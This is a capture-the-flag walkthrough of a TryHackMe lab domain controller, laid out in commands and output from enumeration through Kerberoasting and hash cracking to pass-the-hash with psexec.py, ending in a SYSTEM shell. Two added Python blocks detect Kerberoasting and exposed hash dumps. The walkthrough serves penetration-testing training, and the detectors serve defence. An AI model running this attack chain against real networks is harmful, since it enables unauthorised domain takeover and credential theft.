[TryHackMe] Soupedecode 01: Domain Controller Penetration


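I recently worked through the Active Directory modules on HackTheBox, and since my THM subscription still had a few days left, I picked a room to practice on.

This walkthrough is command-line only, so the lack of screenshots does not affect readability.

Start with nmap: run nmap -sS -Pn -p- <IP> for a full port scan, then scan the open ports in more depth.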

# nmap -sT -A -Pn -p53,88,135,139,389,445,464,593,636,3268,3269,3389,9389,49664,49667,49676,49716 10.201.112.44
Starting Nmap 7.80 ( https://nmap.org ) at 2025-08-03 04:06 UTC
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 64.71% done; ETC: 04:06 (0:00:05 remaining)
Stats: 0:02:54 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.87% done; ETC: 04:09 (0:00:00 remaining)
Nmap scan report for 10.201.112.44
Host is up (0.24s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-08-03 04:06:32Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SOUPEDECODE
|   NetBIOS_Domain_Name: SOUPEDECODE
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: SOUPEDECODE.LOCAL
|   DNS_Computer_Name: DC01.SOUPEDECODE.LOCAL
|   Product_Version: 10.0.20348
|_  System_Time: 2025-08-03T04:09:03+00:00
| ssl-cert: Subject: commonName=DC01.SOUPEDECODE.LOCAL
| Not valid before: 2025-06-17T21:35:42
|_Not valid after:  2025-12-17T21:35:42
|_ssl-date: 2025-08-03T04:09:43+00:00; -1s from scanner time.
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49716/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=8/3%Time=688EE04E%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 4 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-08-03T04:09:04
|_  start_date: N/A

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   168.72 ms 10.14.0.1
2   ... 3
4   237.70 ms 10.201.112.44

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 320.01 seconds

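The room's intro page already says this is a domain controller, but the open ports show it as well: ports 53 and 88 are typical signs.

With no credentials, the options come down to checking for an SMB null session. A null session might allow collecting all account and group information and checking the password policy, which would then guide password spraying. It is also worth checking whether any shares can be accessed directly, to look for sensitive files.

Tried a null session login with rpcclient; unfortunately it failed.

Automated enumeration with enum4linux-ng did not return anything useful either.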

rpcclient -U "" 10.201.42.228 -N
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED
enum4linux-ng -P 10.201.42.228
ENUM4LINUX - next generation (v1.3.4)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.201.42.228
[*] Username ......... ''
[*] Random Username .. 'mgvdoeqa'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 ======================================
|    Listener Scan on 10.201.42.228    |
 ======================================
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ==========================================
|    SMB Dialect Check on 10.201.42.228    |
 ==========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: true

 ============================================================
|    Domain Information via SMB session for 10.201.42.228    |
 ============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: DC01
NetBIOS domain name: SOUPEDECODE
DNS domain: SOUPEDECODE.LOCAL
FQDN: DC01.SOUPEDECODE.LOCAL
Derived membership: domain member
Derived domain: SOUPEDECODE

 ==========================================
|    RPC Session Check on 10.201.42.228    |
 ==========================================
[*] Check for null session
[-] Could not establish null session: STATUS_ACCESS_DENIED
[*] Check for random user
[+] Server allows session using username 'mgvdoeqa', password ''
[H] Rerunning enumeration with user 'mgvdoeqa' might give more results

[!] Aborting remainder of tests, sessions are possible, but not with the provided credentials (see session check results)

Completed after 8.24 seconds

Trying the shares shows two interesting ones, but unfortunately neither can be accessed directly.

smbclient -L \\10.201.42.228
Password for [WORKGROUP\root]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available

That being so, what is needed most right now is a set of credentials, so try enumerating valid usernames with kerbrute.

../../kerbrute_linux_amd64 userenum -d SOUPEDECODE.LOCAL --dc 10.201.42.228 /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -o vusers.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 08/03/25 - Ronnie Flathers @ropnop

2025/08/03 08:48:26 >  Using KDC(s):
2025/08/03 08:48:26 >   10.201.42.228:88

2025/08/03 08:48:26 >  [+] VALID USERNAME:       admin@SOUPEDECODE.LOCAL
2025/08/03 08:48:27 >  [+] VALID USERNAME:       charlie@SOUPEDECODE.LOCAL
2025/08/03 08:48:41 >  [+] VALID USERNAME:       guest@SOUPEDECODE.LOCAL
2025/08/03 08:48:43 >  [+] VALID USERNAME:       Charlie@SOUPEDECODE.LOCAL
2025/08/03 08:49:11 >  [+] VALID USERNAME:       administrator@SOUPEDECODE.LOCAL
2025/08/03 08:49:14 >  [+] VALID USERNAME:       Admin@SOUPEDECODE.LOCAL

Four users were found, one of which is guest.

After cleaning up the list:

admin
charlie
administrator
guest

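First, check whether any user is AS-REP roastable, that is, a user that does not require Kerberos pre-authentication. For such a user we can directly obtain the TGT response (AS-REP) and then crack the hash offline.

Use impacket's GetNPUsers.py tool for the attack.

Unfortunately, there are none.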

/root/.local/bin/GetNPUsers.py SOUPEDECODE.LOCAL/ -usersfile vusers.txt  -dc-ip 10.201.42.228
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

/root/.local/bin/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[-] User admin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User charlie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User guest doesn't have UF_DONT_REQUIRE_PREAUTH set

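As is well known, the guest user is often left with an empty password, so retry the earlier steps as guest.

Accessing the shares gives the same result: none of them is accessible.

Logging in with rpcclient as guest, the most obvious difference from before is that it now gets in, whereas earlier it could not even connect. A difference brings hope.

However, enumerating users directly with enumdomusers is still denied. Experienced people already know what to do, but someone without experience can also work out a viable approach.

One command failing does not mean they all will.

Every user has a RID, so can I look up the username from the RID? If that works, it can be done in bulk to enumerate account names.

queryuser is not permitted; if this were the only command you knew, you might give up on this route right there.

By asking an AI, I learned that lookupsids resolves a SID to a username, and that the domain SID plus the RID forms a unique security identifier. Asking again which command returns the domain SID gave the answer: lsaquery.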

rpcclient -U "guest" 10.201.42.228
Password for [WORKGROUP\guest]:
rpcclient $> lsaquery
Domain Name: SOUPEDECODE
Domain Sid: S-1-5-21-2986980474-46765180-2505414164
rpcclient $> lookupsids S-1-5-21-2986980474-46765180-2505414164-500
S-1-5-21-2986980474-46765180-2505414164-500 SOUPEDECODE\Administrator (1)
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $>

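After confirming that this works, searching online for keywords such as "RID brute force" and "RID enumeration" led to crackmapexec's --rid-brute option.

It lists all accounts and groups.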

crackmapexec smb 10.201.42.228 -u guest -p "" --rid-brute
SMB         10.201.42.228   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.42.228   445    DC01             [+] SOUPEDECODE.LOCAL\guest: 
SMB         10.201.42.228   445    DC01             [+] Brute forcing RIDs
SMB         10.201.42.228   445    DC01             498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.201.42.228   445    DC01             500: SOUPEDECODE\Administrator (SidTypeUser)
SMB         10.201.42.228   445    DC01             501: SOUPEDECODE\Guest (SidTypeUser)
SMB         10.201.42.228   445    DC01             502: SOUPEDECODE\krbtgt (SidTypeUser)
SMB         10.201.42.228   445    DC01             512: SOUPEDECODE\Domain Admins (SidTypeGroup)
SMB         10.201.42.228   445    DC01             513: SOUPEDECODE\Domain Users (SidTypeGroup)
SMB         10.201.42.228   445    DC01             514: SOUPEDECODE\Domain Guests (SidTypeGroup)
SMB         10.201.42.228   445    DC01             515: SOUPEDECODE\Domain Computers (SidTypeGroup)
SMB         10.201.42.228   445    DC01             516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
SMB         10.201.42.228   445    DC01             517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
SMB         10.201.42.228   445    DC01             518: SOUPEDECODE\Schema Admins (SidTypeGroup)
SMB         10.201.42.228   445    DC01             519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)

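Process the output to keep only the account names, then try weak passwords against each account. Spraying a single password is also an option, but I did not know which one to use, so trying the username as the password seemed more likely to succeed.

One result came back.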

crackmapexec smb 10.201.42.228 -u users.txt -p users.txt --no-bruteforce --continue-on-success | grep +
SMB                      10.201.42.228   445    DC01             [+] SOUPEDECODE.LOCAL\ybob317:ybob317

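The HTB courses taught me that penetration testing is an iterative process: after obtaining a new account, repeat some of the earlier steps, and new findings often turn up.

This time the Users share is accessible, but backup is still denied.

It is easy to see that this is the Windows Users directory, and the first flag is on ybob317's Desktop.

I then used crackmapexec's spider_plus module to crawl the files, but found nothing useful.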

smbclient -U "ybob317" //10.201.42.228/Users
Password for [WORKGROUP\ybob317]:
Try "help" to get a list of possible commands.
smb: \> ls
.                                  DR        0  Thu Jul  4 22:48:22 2024
..                                DHS        0  Wed Jun 18 22:14:47 2025
admin                               D        0  Thu Jul  4 22:49:01 2024
Administrator                       D        0  Sun Aug  3 08:19:57 2025
All Users                       DHSrn        0  Sat May  8 08:26:16 2021
Default                           DHR        0  Sun Jun 16 02:51:08 2024
Default User                    DHSrn        0  Sat May  8 08:26:16 2021
desktop.ini                       AHS      174  Sat May  8 08:14:03 2021
Public                             DR        0  Sat Jun 15 17:54:32 2024
ybob317                             D        0  Mon Jun 17 17:24:32 2024

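After that I tried bloodhound-python to collect information, but for some reason it kept throwing errors, so I went straight to looking for service accounts that can be Kerberoasted. Of course, one could also check whether it is possible to log in to the domain controller over RDP and collect information there; I did not try that here.

First use GetUserSPNs.py to find which service accounts exist, then add -request to obtain the tickets.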

/root/.local/bin/GetUserSPNs.py -dc-ip 10.201.42.228 SOUPEDECODE.LOCAL/ybob317
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------  --------------  --------  --------------------------  ---------  ----------
FTP/FileServer          file_svc                  2024-06-17 17:32:23.726085  <never>               
FW/ProxyServer          firewall_svc              2024-06-17 17:28:32.710125  <never>               
HTTP/BackupServer       backup_svc                2024-06-17 17:28:49.476511  <never>               
HTTP/WebServer          web_svc                   2024-06-17 17:29:04.569417  <never>               
HTTPS/MonitoringServer  monitoring_svc            2024-06-17 17:29:18.511871  <never>
/root/.local/bin/GetUserSPNs.py -dc-ip 10.201.42.228 SOUPEDECODE.LOCAL/ybob317 -request
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

Password:
ServicePrincipalName    Name            MemberOf  PasswordLastSet             LastLogon  Delegation 
----------------------  --------------  --------  --------------------------  ---------  ----------
FTP/FileServer          file_svc                  2024-06-17 17:32:23.726085  <never>               
FW/ProxyServer          firewall_svc              2024-06-17 17:28:32.710125  <never>               
HTTP/BackupServer       backup_svc                2024-06-17 17:28:49.476511  <never>               
HTTP/WebServer          web_svc                   2024-06-17 17:29:04.569417  <never>               
HTTPS/MonitoringServer  monitoring_svc            2024-06-17 17:29:18.511871  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*file_svc$SOUPEDECODE.LOCAL$SOUPEDECODE.LOCAL/file_svc*$44c32b4356fe91bab1ef477b8255bb48$6e5386553b4167022af183c93e592662166a62357a6decc27023e265e2c5f18b...

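Tickets can be obtained for all five accounts. The tickets are encrypted with the service account's hash, so cracking can be attempted.

Put the hashes in hash.txt and crack them with hashcat, using the classic rockyou wordlist.

The only one that cracked was file_svc.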

sudo hashcat -a 0 -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
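
The Kerberoasting step above, seen from the domain controller's side. This is an added detection example, not part of the original post: it reads Security event 4769 records (constructed here as JSON lines) and flags an account that requests RC4 (etype 0x17) service tickets for several user-backed services in a short window, which is the pattern the GetUserSPNs.py -request run produces. The window, the threshold, the source addresses and the user "jdoe" are assumptions.

```python
import json
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                # etype 23, the "$krb5tgs$23$" prefix in the output above
WINDOW = timedelta(minutes=5)  # assumed tuning value
THRESHOLD = 3                  # distinct services per requester per window (assumed)

# Constructed sample: Security event 4769 records exported as JSON lines.
# The source addresses and the user "jdoe" are made up for the example.
SAMPLE = """\
{"time":"2025-08-03T09:10:01","EventID":4769,"TargetUserName":"ybob317@SOUPEDECODE.LOCAL","ServiceName":"file_svc","TicketEncryptionType":"0x17","IpAddress":"::ffff:192.0.2.50"}
{"time":"2025-08-03T09:10:01","EventID":4769,"TargetUserName":"ybob317@SOUPEDECODE.LOCAL","ServiceName":"firewall_svc","TicketEncryptionType":"0x17","IpAddress":"::ffff:192.0.2.50"}
{"time":"2025-08-03T09:10:02","EventID":4769,"TargetUserName":"ybob317@SOUPEDECODE.LOCAL","ServiceName":"backup_svc","TicketEncryptionType":"0x17","IpAddress":"::ffff:192.0.2.50"}
{"time":"2025-08-03T09:10:02","EventID":4769,"TargetUserName":"ybob317@SOUPEDECODE.LOCAL","ServiceName":"web_svc","TicketEncryptionType":"0x17","IpAddress":"::ffff:192.0.2.50"}
{"time":"2025-08-03T09:10:03","EventID":4769,"TargetUserName":"ybob317@SOUPEDECODE.LOCAL","ServiceName":"monitoring_svc","TicketEncryptionType":"0x17","IpAddress":"::ffff:192.0.2.50"}
{"time":"2025-08-03T09:12:40","EventID":4769,"TargetUserName":"jdoe@SOUPEDECODE.LOCAL","ServiceName":"web_svc","TicketEncryptionType":"0x12","IpAddress":"::ffff:192.0.2.61"}
{"time":"2025-08-03T09:13:05","EventID":4769,"TargetUserName":"jdoe@SOUPEDECODE.LOCAL","ServiceName":"DC01$","TicketEncryptionType":"0x12","IpAddress":"::ffff:192.0.2.61"}
{"time":"2025-08-03T09:15:00","EventID":4769,"TargetUserName":"jdoe@SOUPEDECODE.LOCAL","ServiceName":"file_svc","TicketEncryptionType":"0x17","IpAddress":"::ffff:192.0.2.61"}
"""

def suspicious_requesters(lines, window=WINDOW, threshold=THRESHOLD):
    """Map requester -> services when one account requests RC4 service tickets
    for at least `threshold` distinct user-backed services inside `window`."""
    per_user = defaultdict(list)
    for line in filter(None, map(str.strip, lines)):
        ev = json.loads(line)
        svc = ev.get("ServiceName", "")
        # Tickets for krbtgt and machine accounts (name ends in $) are routine noise.
        if ev.get("EventID") != 4769 or svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        when = datetime.fromisoformat(ev["time"])
        per_user[ev["TargetUserName"].lower()].append((when, svc.lower()))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            seen = {s for t, s in reqs[i:] if t - start <= window}
            if len(seen) >= threshold:
                hits[user] = sorted(seen)
                break
    return hits

if __name__ == "__main__":
    for user, services in suspicious_requesters(SAMPLE.splitlines()).items():
        print(f"possible Kerberoasting by {user}: {', '.join(services)}")
```

Service accounts with long random passwords (or gMSAs) make a captured ticket impractical to crack, which is the mitigation for the file_svc result above.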

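With the new credentials, repeat the earlier steps again to see whether anything new turns up. Sure enough, the backup share is accessible this time.

It contains one file.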

smbclient -U "file_svc" //10.201.42.228/backup
Password for [WORKGROUP\file_svc]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jun 17 17:41:17 2024
  ..                                 DR        0  Fri Jul 25 17:51:20 2025
  backup_extract.txt                  A      892  Mon Jun 17 08:41:05 2024

                12942591 blocks of size 4096. 10602790 blocks available
smb: \> get backup_extract.txt 
getting file \backup_extract.txt of size 892 as backup_extract.txt (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)

The file contains hashes for some machine accounts.

cat backup_extract.txt 
WebServer$:2119:aad3b435b51404eeaad3b435b51404ee:c47b45f5d4df5a494bd19f13e14f7902:::
DatabaseServer$:2120:aad3b435b51404eeaad3b435b51404ee:406b424c7b483a42458bf6f545c936f7:::
CitrixServer$:2122:aad3b435b51404eeaad3b435b51404ee:48fc7eca9af236d7849273990f6c5117:::
FileServer$:2065:aad3b435b51404eeaad3b435b51404ee:e41da7e79a4c76dbd9cf79d1cb325559:::
MailServer$:2124:aad3b435b51404eeaad3b435b51404ee:46a4655f18def136b3bfab7b0b4e70e3:::
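
A file like this sitting on a readable share is the finding a defender wants to catch first. The following is an added example, not part of the original post: it scans text files under a directory (for instance a mounted copy of a share) for lines in the name:rid:LM:NT::: layout shown above and reports where they are without copying the hash values. The sample input, account names and the size limit are constructed for the example.

```python
import os
import re

# LM hash of the empty string: what dumps show when LM storage is disabled.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
# pwdump layout as in backup_extract.txt above: name:rid:LM:NT:::
PWDUMP = re.compile(
    r"^(?P<name>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

# Constructed sample; account names and hash values are placeholders, not real data.
SAMPLE = """\
# nightly export
ExampleHost$:3001:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
example.user:3002:0123456789abcdef0123456789abcdef:ffeeddccbbaa99887766554433221100:::
not:a:hash:line
"""

def scan_text(text):
    """Return one finding per pwdump-style line. Hash values are never copied
    into the result, so the report itself does not leak credentials."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = PWDUMP.match(line.strip())
        if m:
            findings.append({
                "line": lineno,
                "account": m["name"],
                "rid": int(m["rid"]),
                "machine_account": m["name"].endswith("$"),
                "lm_empty": m["lm"].lower() == EMPTY_LM,
            })
    return findings

def scan_tree(root, max_bytes=1_000_000):
    """Walk a directory (e.g. a mounted share) and map path -> findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if os.path.getsize(path) > max_bytes:
                    continue   # skip large files; dumps like this are small
                with open(path, encoding="utf-8", errors="ignore") as fh:
                    found = scan_text(fh.read())
            except OSError:
                continue       # unreadable file: nothing to report
            if found:
                report[path] = found
    return report

if __name__ == "__main__":
    print(scan_text(SAMPLE))
```

Any account reported by such a scan should have its password reset, since the NT hash alone is enough to authenticate, as the next step of the walkthrough shows.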

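Clearly, all of these hashes should be tried, using crackmapexec.

One of them succeeds, and it carries the Pwn3d! marker, which means this account has administrator privileges on the domain controller.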

crackmapexec smb 10.201.42.228 -u coms.txt -H hashes.txt --no-bruteforce --continue-on-success
SMB         10.201.42.228   445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB         10.201.42.228   445    DC01             [-] SOUPEDECODE.LOCAL\WebServer$:c47b45f5d4df5a494bd19f13e14f7902 STATUS_LOGON_FAILURE 
SMB         10.201.42.228   445    DC01             [-] SOUPEDECODE.LOCAL\DatabaseServer$:406b424c7b483a42458bf6f545c936f7 STATUS_LOGON_FAILURE 
SMB         10.201.42.228   445    DC01             [-] SOUPEDECODE.LOCAL\CitrixServer$:48fc7eca9af236d7849273990f6c5117 STATUS_LOGON_FAILURE 
SMB         10.201.42.228   445    DC01             [+] SOUPEDECODE.LOCAL\FileServer$:e41da7e79a4c76dbd9cf79d1cb325559 (Pwn3d!)

Use impacket's psexec.py to try to get a shell.

On success the shell runs as the SYSTEM account; the second flag is on the Administrator's desktop.

/root/.local/bin/psexec.py SOUPEDECODE.LOCAL/'FileServer$'@10.201.42.228 -hashes :e41da7e79a4c76dbd9cf79d1cb325559
/root/.local/share/pipx/venvs/impacket/lib/python3.13/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
  import pkg_resources
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.201.42.228.....
[*] Found writable share ADMIN$
[*] Uploading file lJEHYjMS.exe
[*] Opening SVCManager on 10.201.42.228.....
[*] Creating service bGQb on 10.201.42.228.....
[*] Starting service bGQb.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

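Path: guest with empty password -> RID brute force to get the user list -> weak password -> find service accounts and Kerberoast them -> access the SMB share and find the backed-up list of accounts and hashes -> try logging in; one succeeds and has administrator privileges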

posted @ 2025-08-03 18:38  巡璃27